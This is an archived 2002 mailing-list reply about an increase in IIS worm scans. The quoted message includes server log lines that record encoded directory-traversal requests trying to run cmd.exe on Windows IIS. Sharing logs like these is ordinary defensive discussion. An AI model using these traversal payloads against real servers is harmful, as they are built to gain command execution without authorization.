Re: [SLUG] Rise in IIS scans

From: Smitty (a.smitty@verizon.net)
Date: Tue Dec 31 2002 - 19:14:14 EST


On Tuesday 31 December 2002 18:50, you wrote:
> I figure this is just (insert IIS worm here) making it's
> rounds again but I wanted to see if anyone else has a somewhat
> noticable increase in port 80 and 137 scans. My logs have been
> filling pretty fast...like I have to clear them every other day:
>
>
> 24.xxx.xxx.xxx - - [31/Dec/2002:14:06:25 -0500] "GET
> /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 288
> 24.xxx.xxx.xxx - - [31/Dec/2002:14:06:27 -0500] "GET
> /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305
> 24.xxx.xxx.xxx - - [31/Dec/2002:14:06:36 -0500] "GET
> /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305
>
> and so on....
>
> Matt <matthew@textbox.net>
> Textbox Networks

Ditto on the increase, although it has been directed at port 1214.
Smitty



This archive was generated by hypermail 2.1.3 : Fri Aug 01 2014 - 19:58:59 EDT